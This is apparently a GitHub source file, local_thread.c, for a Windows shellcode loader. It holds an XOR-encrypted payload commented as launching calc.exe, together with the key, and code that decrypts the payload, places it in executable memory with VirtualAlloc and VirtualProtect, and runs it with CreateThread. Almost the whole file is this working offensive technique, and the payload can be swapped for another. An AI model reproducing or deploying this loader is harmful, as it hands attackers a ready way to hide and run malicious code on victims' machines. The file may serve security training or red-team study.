-
Notifications
You must be signed in to change notification settings - Fork 0
/
local_thread.c
99 lines (83 loc) · 3.66 KB
/
local_thread.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#include <Windows.h>
#include <stdio.h>
#include <stdint.h>
/*
Simple local thread shellcode execution.
A shellcode XOR encryption is implemented as well.
*/
/*===================================#
# XORED PAYLOAD HANDLINGFROM #
# xor_payload.c #
#===================================*/
// Xored shellcode with calc.exe
uint8_t calc_shellcode_xored[] = {
0x8A, 0x2D, 0xF1, 0x9D, 0xAF, 0x9B, 0xB4, 0x72, 0x6F, 0x6E, 0x26, 0x0E, 0x2A, 0x35, 0x2B,
0x27, 0x33, 0x3A, 0x48, 0x8D, 0x16, 0x3C, 0xF9, 0x3D, 0x0E, 0x2F, 0xD4, 0x39, 0x7D, 0x31,
0xFD, 0x37, 0x52, 0x31, 0xD4, 0x01, 0x24, 0x3A, 0x60, 0xD9, 0x2D, 0x15, 0x26, 0x54, 0xB0,
0x3E, 0x54, 0xB2, 0xD5, 0x63, 0x12, 0x08, 0x70, 0x43, 0x4E, 0x26, 0x9E, 0xA2, 0x68, 0x38,
0x77, 0xA4, 0x90, 0x94, 0x0D, 0x32, 0x25, 0x3A, 0xE4, 0x3C, 0x47, 0xD4, 0x29, 0x59, 0x31,
0x77, 0xB5, 0xF9, 0xF9, 0xD7, 0x73, 0x74, 0x72, 0x27, 0xEB, 0xA7, 0x2B, 0x0C, 0x2D, 0x78,
0xA6, 0x35, 0xF9, 0x31, 0x47, 0x37, 0xFF, 0x32, 0x4F, 0x27, 0x66, 0x8F, 0x88, 0x33, 0x31,
0x89, 0xAC, 0x33, 0xF2, 0x6B, 0xFB, 0x3C, 0x73, 0xB9, 0x23, 0x56, 0x96, 0x23, 0x54, 0xB9,
0xDA, 0x24, 0xB3, 0xB0, 0x52, 0x32, 0x75, 0xB3, 0x57, 0x8E, 0x12, 0xAE, 0x27, 0x66, 0x35,
0x52, 0x6D, 0x37, 0x40, 0x8E, 0x06, 0xAC, 0x2A, 0x2B, 0xE5, 0x27, 0x7B, 0x22, 0x64, 0xA9,
0x10, 0x24, 0xF9, 0x75, 0x17, 0x37, 0xFF, 0x32, 0x73, 0x27, 0x66, 0x8F, 0x2A, 0xEE, 0x7D,
0xFE, 0x2D, 0x73, 0xA9, 0x1E, 0x2B, 0x35, 0x2A, 0x31, 0x37, 0x3D, 0x1E, 0x33, 0x24, 0x20,
0x37, 0x3F, 0x3A, 0xFA, 0xB3, 0x53, 0x35, 0x20, 0x90, 0x8E, 0x3F, 0x1E, 0x32, 0x3F, 0x31,
0xFD, 0x77, 0x9B, 0x2E, 0xA0, 0x8C, 0x8B, 0x2F, 0x27, 0xD4, 0x66, 0x5F, 0x6B, 0x65, 0x79,
0x76, 0x65, 0x72, 0x31, 0xD2, 0xFE, 0x75, 0x73, 0x6F, 0x6E, 0x26, 0xE5, 0x5A, 0xEE, 0x16,
0xF1, 0x9A, 0xA7, 0xC2, 0xBF, 0x6E, 0x5E, 0x78, 0x2E, 0xD4, 0xC1, 0xCA, 0xD6, 0xF8, 0x86,
0xA3, 0x2D, 0xF1, 0xBD, 0x77, 0x4F, 0x72, 0x0E, 0x65, 0xEE, 0x9C, 0xBF, 0x1E, 0x60, 0xC2,
0x31, 0x76, 0x00, 0x16, 0x35, 0x73, 0x2D, 0x33, 0xE6, 0xB4, 0x98, 0x8A, 0x08, 0x04, 0x15,
0x15, 0x65,
};
uint8_t xor_key[] = {
'v', 'e', 'r', 'y', '_', 's', 't', 'r', 'o', 'n', 'g', '_', 'k', 'e', 'y'
};
void xor_by_key(IN OUT uint8_t shellcode[], IN const size_t shellcode_sz, IN const uint8_t key[], IN const size_t key_sz) {
for (size_t i = 0; i < shellcode_sz; i++) {
// Get byte of key
uint8_t byte_key = key[i % key_sz];
// Calculate value
shellcode[i] = shellcode[i] ^ byte_key;
}
}
void print_bytes(IN const uint8_t bytes[], IN const size_t bytes_sz) {
for (size_t i = 0; i < bytes_sz; i++) {
if (i > 0 && i % 15 == 0) {
printf("\n");
}
printf("0x%02X, ", calc_shellcode_xored[i]);
}
}
int main() {
// Allocate memory
void* mem= VirtualAlloc(NULL, sizeof(calc_shellcode_xored), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (mem == NULL) {
printf("[!] VirtualAlloc error: %d \n", GetLastError());
return -1;
}
// Decrypt the shellcode
xor_by_key(calc_shellcode_xored, sizeof(calc_shellcode_xored), xor_key, sizeof(xor_key));
// Copy the shellcode to the allocated memory
memcpy(mem, calc_shellcode_xored, sizeof(calc_shellcode_xored));
// Set original shellcode to 0
memset(calc_shellcode_xored, 0x00, sizeof(calc_shellcode_xored));
// Change allocated memory permissions
DWORD old_protect = NULL;
if (!VirtualProtect(mem, sizeof(calc_shellcode_xored), PAGE_EXECUTE, &old_protect)) {
printf("[!] VirtualProtect error: %d \n", GetLastError());
return -1;
}
// Create a thread
HANDLE thread = CreateThread(NULL, NULL, mem, NULL, NULL, NULL);
if (thread == NULL) {
printf("[!] CreateThread error: %d \n", GetLastError());
return -1;
}
WaitForSingleObject(thread, INFINITE);
// Exit
printf("\n\nPress <Enter> To Quit ...");
getchar();
return 0;
}